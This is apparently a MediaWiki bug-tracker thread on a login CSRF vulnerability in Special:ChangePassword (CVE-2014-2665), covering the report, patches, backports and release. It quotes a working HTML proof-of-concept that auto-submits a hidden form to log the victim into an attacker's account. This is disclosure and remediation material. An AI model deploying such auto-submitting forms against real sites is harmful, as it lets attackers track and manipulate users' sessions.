Login csrf in Special:ChangePassword
Closed, ResolvedPublic

Description

Gopinath (via codex.galleryproject.org) reported a login csrf on Special:ChangePassword. Confirmed this in master. Note with the PoC, the victim must have an existing _session cookie on the target wiki, otherwise the login fails.

Special:ChangePassword should use a login token.

On Sun, Mar 9, 2014 at 12:16 PM, Bharat Mediratta <bharat@menalto.com> wrote:

Hi, Wikimedia folks - Gopinath is reporting a vulnerability in Mediawiki 1.22.3 which is running on codex.galleryproject.org - can you take a look at this and decide whether it's something you want to resolve in the Mediawiki codebase?

-Bharat

On Fri, Mar 7, 2014 at 10:14 PM, Gopinath <gopiengg@gmail.com> wrote:
Hi,
Through below CSRF Code user can be logged into the attackers account, without knowledge of user.So attacker can track the user activity.
User also wont know the attacker account password .Attacker can request password reset for his account and can get the value of wpPassword parameter.

POC Code

<html>
<head>
</head>
<body onload=document.forms[0].submit();>
<form action="http://codex.galleryproject.org/Special:ChangePassword" method="POST">

<input type="hidden" name="returnto" value="Main Page" />
<input type="hidden" name="token" value="+\" />
<input type="hidden" name="wpDomain" value="" />
<input type="hidden" name="wpName" value="Gopinath6" />
<input type="hidden" name="wpNewPassword" value=password1234 />
<input type="hidden" name="wpPassword" value=7qbuqjjsme />
<input type="hidden" name="wpRetype" value=password1234 />

</form>
</body>
</html>

Regards
Gopinath


Version: 1.23.0
Severity: normal

bzimport set Reference to bz62497.
csteipp created this task.Via LegacyMar 10 2014, 5:47 PM
csteipp added a comment.Via ConduitMar 10 2014, 7:34 PM

Created attachment 14787
Add CSRF token on Special:ChangePassword

Attached: bug62497.patch

Anomie added a comment.Via ConduitMar 11 2014, 3:17 PM

The patch looks good to me.

csteipp added a comment.Via ConduitMar 26 2014, 1:29 PM

Early access for Wikia.

Mglaser added a comment.Via ConduitMar 26 2014, 10:06 PM

Do we already have a CVE for this bug?

csteipp added a comment.Via ConduitMar 26 2014, 10:15 PM

Not yet. I'll request one as soon as we make it public.

Mglaser added a comment.Via ConduitMar 26 2014, 11:15 PM

Created attachment 14927
Backport to REL1_22

Backported to the best of my knowledge. Special:ChangePassword tested. Can't reproduce the attack, so someone with a deeper understanding of this vulnerability should look at it and confirm it fixes the security issue.

attachment bug62497-122.patch ignored as obsolete

csteipp added a comment.Via ConduitMar 27 2014, 12:56 AM

Created attachment 14933
Backport to REL1_22

I hit a couple issues when testing your patch. I think this is a slightly better way to do it.

Attached: bug62497_122.patch

Mglaser added a comment.Via ConduitMar 27 2014, 9:27 AM

Created attachment 14938
Backport to REL1_21

Backport similar to 14933, so Chris' changes are already considered. Changing passwords was tested. Please look for potentail security implications.

Attached: bug62497_121.patch

Mglaser added a comment.Via ConduitMar 27 2014, 9:50 AM

Created attachment 14939
Backport to REL1_19

Considering Chris' new version of the backport for REL1_22. Tested password change. Still works.

Attached: bug62497_119.patch

Grunny added a comment.Via ConduitMar 27 2014, 10:46 AM

Tested the 1.19 backport patch, and confirmed it fixes the vulnerability.

Mglaser added a comment.Via ConduitMar 28 2014, 1:37 AM

Fix is released in MW 1.19.14, 1.21.8 and 1.22.5. WMF sites are patched.

Wikinaut added a comment.Via ConduitMar 28 2014, 6:54 AM

Comment on attachment 14787
Add CSRF token on Special:ChangePassword

The token compare function is _not_ running in constant time. As we have a function for token comparison, we should use it here.

Wikinaut added a comment.Via ConduitMar 28 2014, 7:12 AM

see http://www.gossamer-threads.com/lists/wiki/mediawiki-cvs/436923 (well, this is essential for _password_ comparison, perhaps not necessarily needed for token comparison, as already discussed elsewhere)

Aklapper added a comment.Via ConduitMar 31 2014, 3:35 PM

For the records, https://www.mediawiki.org/w/index.php?title=Project:Support_desk#Session_Hijacking_error_after_Update_1.19.14_41441 lists an issue with the 1.19.14 tarball including the backport for this.

csteipp added a comment.Via ConduitApr 1 2014, 4:27 PM

Markus just released 1.19.15 to fix the password reset issue.

csteipp added a comment.Via ConduitApr 1 2014, 4:40 PM

Correction, Markus will release 1.19.15 tomorrow to fix the issue. Sorry about that.

csteipp added a comment.Via ConduitApr 1 2014, 8:59 PM

This was assigned CVE-2014-2665.

http://openwall.com/lists/oss-security/2014/04/01/7

The MITRE email also documents their understanding of "Login CSRF", which is good background if this issue pops up again.

Add Comment

Column Prototype
This is a very early prototype of a persistent column. It is not expected to work yet, and leaving it open will activate other new features which will break things. Press "\" (backslash) on your keyboard to close it now.